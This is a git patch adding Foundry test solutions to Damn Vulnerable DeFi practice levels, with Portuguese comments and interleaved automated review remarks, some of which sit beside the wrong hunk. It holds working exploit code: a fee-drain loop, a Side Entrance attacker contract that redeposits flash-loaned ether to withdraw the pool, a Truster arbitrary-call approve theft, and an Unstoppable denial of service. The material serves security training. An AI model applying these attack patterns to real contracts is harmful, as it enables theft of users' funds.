From ddc5db9207a96aeb08a33bbfeab8334612c40c3a Mon Sep 17 00:00:00 2001
From: Duarte
Date: Tue, 7 Jan 2025 12:51:29 +0000
Subject: [PATCH 1/2] modified: test/Levels/naive-receiver/NaiveReceiver.t.sol new file: test/Levels/side-entrance/AttackerContract.sol modified: test/Levels/side-entrance/SideEntrance.t.sol modified: test/Levels/truster/Truster.t.sol modified: test/Levels/unstoppable/Unstoppable.t.sol
---
 .../Levels/naive-receiver/NaiveReceiver.t.sol | 5 +-
 .../Levels/side-entrance/AttackerContract.sol | 52 +++++++++++++++++++
 test/Levels/side-entrance/SideEntrance.t.sol | 8 ++-
 test/Levels/truster/Truster.t.sol | 17 ++++++
 test/Levels/unstoppable/Unstoppable.t.sol | 4 +-
 5 files changed, 83 insertions(+), 3 deletions(-)
 create mode 100644 test/Levels/side-entrance/AttackerContract.sol
diff --git a/test/Levels/naive-receiver/NaiveReceiver.t.sol b/test/Levels/naive-receiver/NaiveReceiver.t.sol
index 7552e9d..3a9ea99 100644
--- a/test/Levels/naive-receiver/NaiveReceiver.t.sol
+++ b/test/Levels/naive-receiver/NaiveReceiver.t.sol
@@ -48,7 +48,10 @@ contract NaiveReceiver is Test {
 /**
 * EXPLOIT START *
 */
-
+ // 1. esgotar o saldo do contrato FlashLoanReceiver, podemos usar fees
+ while (address(flashLoanReceiver).balance > 0) {
+ naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 1);
+ }
 /**
 * EXPLOIT END *
 */
diff --git a/test/Levels/side-entrance/AttackerContract.sol b/test/Levels/side-entrance/AttackerContract.sol
new file mode 100644
index 0000000..ef5ff1e
--- /dev/null
+++ b/test/Levels/side-entrance/AttackerContract.sol
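Review bot: The `while (address(flashLoanReceiver).balance > 0)` loop has no upper bound, so if a `flashLoan` call ever stops reducing the receiver's balance the test spins until it runs out of gas instead of failing with a readable message. A bounded loop makes the expected number of rounds explicit and fails fast, e.g. `for (uint256 i = 0; i < MAX_ROUNDS && address(flashLoanReceiver).balance > 0; i++) {`, where `MAX_ROUNDS` is a placeholder for a test constant derived from the pool fee and the receiver's starting balance, both declared outside this hunk. The new comment is in Portuguese while the surrounding `EXPLOIT START`/`EXPLOIT END` markers are English; `// Drain FlashLoanReceiver's balance through repeated fee payments` keeps the file consistent. The enclosing test function starts and ends outside this hunk.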
@@ -0,0 +1,52 @@
+// Layout of Contract:
+// version
+// imports
+// errors
+// interfaces, libraries, contracts
+// Type declarations
+// State variables
+// Events
+// Modifiers
+// Functions
+
+// Layout of Functions:
+// constructor
+// receive function (if exists)
+// fallback function (if exists)
+// external
+// public
+// internal
+// private
+// internal & private view & pure functions
+// external & public view & pure functions
+
+// SPDX-License-Identifier: SEE LICENSE IN LICENSE
+pragma solidity 0.8.17;
+
+// Imports
+import {Utilities} from "../../utils/Utilities.sol";
+import {Address} from "openzeppelin-contracts/utils/Address.sol";
+import "forge-std/Test.sol";
+import {SideEntranceLenderPool} from "../../../src/Contracts/side-entrance/SideEntranceLenderPool.sol";
+import {IFlashLoanEtherReceiver} from "../../../src/Contracts/side-entrance/SideEntranceLenderPool.sol";
+
+import {SideEntrance} from "./SideEntrance.t.sol";
+// contract
+
+contract Attack is IFlashLoanEtherReceiver{
+ SideEntranceLenderPool private immutable sideEntrance;
+ using Address for address payable;
+ constructor(address _sideEntrance){
+ sideEntrance = SideEntranceLenderPool(_sideEntrance);
+ }
+ function execute() external payable{
+ sideEntrance.deposit{value:msg.value}();
+ }
+
+ function attack() external{
+ sideEntrance.flashLoan(address(sideEntrance).balance);
+ sideEntrance.withdraw();
+ payable(msg.sender).sendValue(address(this).balance);
+ }
+ receive() external payable {}
+}
\ No newline at end of file
diff --git a/test/Levels/side-entrance/SideEntrance.t.sol b/test/Levels/side-entrance/SideEntrance.t.sol
index 6eb2dad..f2cb8a8 100644
--- a/test/Levels/side-entrance/SideEntrance.t.sol
+++ b/test/Levels/side-entrance/SideEntrance.t.sol
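Review bot: `import {SideEntrance} from "./SideEntrance.t.sol";` is never used inside `Attack`, and because the SideEntrance.t.sol hunk in this same patch adds `import {Attack} from "./AttackerContract.sol";`, the two files now import each other; the cycle compiles but couples the helper contract to the test that deploys it. `import {Utilities} from "../../utils/Utilities.sol";` and `import "forge-std/Test.sol";` are also unused here, so all three lines can be dropped, leaving only the `Address`, `SideEntranceLenderPool` and `IFlashLoanEtherReceiver` imports. The file's own header lists `version` first, yet the SPDX identifier and `pragma solidity 0.8.17;` only appear after 22 lines of layout comments; by convention the SPDX line is line 1. `execute()` appears to be the `IFlashLoanEtherReceiver` callback the pool invokes, and a one-line NatSpec `/// @notice` saying so would help a reader unfamiliar with that interface; the file also lacks a trailing newline.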
@@ -3,8 +3,8 @@ pragma solidity >=0.8.0;
 import {Utilities} from "../../utils/Utilities.sol";
 import "forge-std/Test.sol";
-
 import {SideEntranceLenderPool} from "../../../src/Contracts/side-entrance/SideEntranceLenderPool.sol";
+import {Attack} from "./AttackerContract.sol";
 contract SideEntrance is Test {
 uint256 internal constant ETHER_IN_POOL = 1_000e18;
@@ -36,6 +36,12 @@ contract SideEntrance is Test {
 /**
 * EXPLOIT START *
 */
+ // usar o eth transferido para retirar mais eth do contrato
+ // 1. impletar o ataque
+ vm.startPrank(attacker);
+ Attack attack_contract = new Attack(address(sideEntranceLenderPool));
+ attack_contract.attack();
+ vm.stopPrank();
 /**
 * EXPLOIT END *
diff --git a/test/Levels/truster/Truster.t.sol b/test/Levels/truster/Truster.t.sol
index 2848992..3936fc4 100644
--- a/test/Levels/truster/Truster.t.sol
+++ b/test/Levels/truster/Truster.t.sol
@@ -41,6 +41,23 @@ contract Truster is Test {
 /**
 * EXPLOIT START *
 */
+ // 1. Criar o approve
+ bytes memory data = abi.encodeWithSignature(
+ "approve(address,uint256)",
+ attacker,
+ TOKENS_IN_POOL
+ );
+
+ trusterLenderPool.flashLoan(0, attacker, address(dvt), data);
+
+ // 2. ver o allowance
+ uint256 allowance = dvt.allowance(address(trusterLenderPool), attacker);
+ console.log("Allowance after approve:", allowance);
+
+ // 3. executar a transferência
+ vm.startPrank(attacker);
+ dvt.transferFrom(address(trusterLenderPool), attacker, TOKENS_IN_POOL);
+ vm.stopPrank();
 /**
 * EXPLOIT END *
diff --git a/test/Levels/unstoppable/Unstoppable.t.sol b/test/Levels/unstoppable/Unstoppable.t.sol
index 8633755..df8cad4 100644
--- a/test/Levels/unstoppable/Unstoppable.t.sol
+++ b/test/Levels/unstoppable/Unstoppable.t.sol
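Review bot: `Attack attack_contract = new Attack(address(sideEntranceLenderPool));` names a local in snake_case, while the Solidity style guide and the rest of the visible test code (`sideEntranceLenderPool`, `flashLoanReceiver`) use mixedCase; rename it `attackContract` on this line and in `attack_contract.attack();`. The comment `// 1. impletar o ataque` has a typo (`implementar`) and, like the other new comments in this patch, is in Portuguese where the surrounding `EXPLOIT START`/`EXPLOIT END` markers are English. The enclosing test function starts outside this hunk.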
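Review bot: `console.log("Allowance after approve:", allowance);` only prints intermediate state, so if the preceding `flashLoan` step ever stopped producing the allowance the test would still run on and fail later with a less informative revert; replace the log with `assertEq(allowance, TOKENS_IN_POOL);` so the precondition is checked rather than observed. `vm.startPrank(attacker); ... vm.stopPrank();` brackets a single call and can be a single `vm.prank(attacker);` immediately before `dvt.transferFrom(...)`. If this file's pragma admits it (the sibling tests declare `>=0.8.0`, and `abi.encodeCall` needs 0.8.11 or later), `abi.encodeCall(dvt.approve, (attacker, TOKENS_IN_POOL))` gives compile-time checking of the selector and argument types that `abi.encodeWithSignature` does not. The enclosing test function starts outside this hunk.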
@@ -2,7 +2,7 @@
 pragma solidity >=0.8.0;
 import {Utilities} from "../../utils/Utilities.sol";
-import "forge-std/Test.sol";
+import "../../../lib/forge-std/src/Test.sol";
 import {DamnValuableToken} from "../../../src/Contracts/DamnValuableToken.sol";
 import {UnstoppableLender} from "../../../src/Contracts/unstoppable/UnstoppableLender.sol";
@@ -60,6 +60,8 @@ contract Unstoppable is Test {
 /**
 * EXPLOIT START *
 */
+ //1. colocar fundos no contrato unstoppableLender para quebrar a validação
+ dvt.transfer(address(unstoppableLender), 1);
 /**
 * EXPLOIT END *
 */
From eb1b1cca25ba3f622fb77844b177148f89fd2259 Mon Sep 17 00:00:00 2001
From: Duarte
Date: Tue, 7 Jan 2025 12:57:49 +0000
Subject: [PATCH 2/2] modified: test/Levels/side-entrance/AttackerContract.sol
---
 test/Levels/side-entrance/AttackerContract.sol | 1 -
 1 file changed, 1 deletion(-)
diff --git a/test/Levels/side-entrance/AttackerContract.sol b/test/Levels/side-entrance/AttackerContract.sol
index ef5ff1e..00f2764 100644
--- a/test/Levels/side-entrance/AttackerContract.sol
+++ b/test/Levels/side-entrance/AttackerContract.sol
@@ -8,7 +8,6 @@
 // Events
 // Modifiers
 // Functions
-
 // Layout of Functions:
 // constructor
 // receive function (if exists)
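Review bot: `import "../../../lib/forge-std/src/Test.sol";` bypasses the `forge-std/` remapping that the other test files in this patch still use (`SideEntrance.t.sol` and `AttackerContract.sol` both import `forge-std/Test.sol`), tying this one test to the library's checkout path; if the remapped and relative paths resolve to different source unit names, `Test` may be compiled twice, which is confusing at best and can surface as duplicate-declaration errors. Revert to `import "forge-std/Test.sol";` unless the remapping is genuinely broken, in which case the fix belongs in the remappings configuration rather than in a single test. In the second hunk, `//1. colocar fundos ...` lacks the space after `//` that the other new comments use and is in Portuguese where the surrounding markers are English; the enclosing test function starts outside that hunk.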